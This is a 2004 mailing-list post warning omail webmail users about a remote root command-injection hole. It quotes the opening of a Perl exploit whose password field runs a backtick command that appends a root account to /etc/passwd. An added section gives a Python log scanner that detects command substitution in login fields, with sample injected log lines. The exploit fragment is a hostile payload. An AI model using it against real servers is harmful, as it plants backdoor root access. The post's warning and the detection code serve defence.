Re: [Omail-devel] [Fwd: remote root exec vulnerability in omail] - exploit around
From: Olivier M. <om-...@om...> - 2004-05-18 16:54:26
On Fri, 2004-05-07 at 17:02 +0200, Olivier Mueller wrote:
> FYI, a patch would be required, but I have absolutely no time
> to work on that the next hours. Carter, would you have some?

I've got a server turned down with an omail-webmail exploit today,
crazy to see that there are people who have nothing better to do
than mess with other ppl's servers :(

beginning of the code:
------------------------------------------------------------------
#!/usr/bin/perl
use IO::Socket;
$target = $ARGV[0] || 'whitehat.com/cgi-sbin/omail.pl';
if($target =~ /^(http:\/\/)*(.*?\/)(.*)$/i){
    $getline = '/'.$3;
    $host = $2;
    $host =~ s/\/$//;
}
#setup action, userid, password
$getline .= '?action=login&userid=xxx%40me.com&password=';
$getline1 = $getline . '`echo%20%27qmailiq:x:0:0::%2ftmp:%2fbin%2fbash%27>>%2fetc%2fpasswd`';
[...]
-----------------------------------------------------------------------

So if you still have some omail webmail running, you'd better turn
it off for the moment.

Olivier
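
Added example (not part of the original message, and not omail or exploit code): a Python check that scans web server access-log lines for omail login requests whose userid or password field carries shell command substitution, the pattern visible in the excerpt above. The log lines are constructed samples; the Common Log Format layout, the /cgi-bin/ path and the extra "$(" pattern are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Command substitution in a login field. The backtick is what the excerpt
# above uses; "$(" is the equivalent shell syntax (added as an assumption).
CMD_SUBST = re.compile(r"`|\$\(")
# Request part of a Common Log Format line (assumed log layout).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
CHECKED_FIELDS = ("userid", "password")

def suspicious_fields(log_line, script="omail.pl"):
    """Return sorted names of login fields that carry command substitution."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith("/" + script):
        return []
    # parse_qsl percent-decodes, so %60 and a literal backtick both match.
    params = parse_qsl(url.query, keep_blank_values=True)
    if ("action", "login") not in params:
        return []
    return sorted({k for k, v in params
                   if k in CHECKED_FIELDS and CMD_SUBST.search(v)})

def scan(lines):
    """Return (line_number, fields) for every line worth an analyst's look."""
    hits = []
    for n, line in enumerate(lines, 1):
        fields = suspicious_fields(line)
        if fields:
            hits.append((n, fields))
    return hits

# Constructed sample lines (documentation IP ranges, harmless `id` marker).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/May/2004:10:01:02 +0200] "GET /cgi-bin/omail.pl?action=login&userid=bob%40example.org&password=s3cret HTTP/1.0" 200 512',
    '198.51.100.7 - - [18/May/2004:10:05:40 +0200] "GET /cgi-bin/omail.pl?action=login&userid=xxx%40me.com&password=`id` HTTP/1.0" 200 512',
    '198.51.100.7 - - [18/May/2004:10:05:41 +0200] "GET /cgi-bin/omail.pl?action=login&userid=xxx%40me.com&password=%60id%60 HTTP/1.0" 200 512',
    '192.0.2.10 - - [18/May/2004:10:06:00 +0200] "GET /index.html?q=`id` HTTP/1.0" 200 100',
]

if __name__ == "__main__":
    for n, fields in scan(SAMPLE_LOG):
        print(f"line {n}: command substitution in {', '.join(fields)}")
```

Access logs normally record only the query string, so parameters sent in a POST body will not show up in this check.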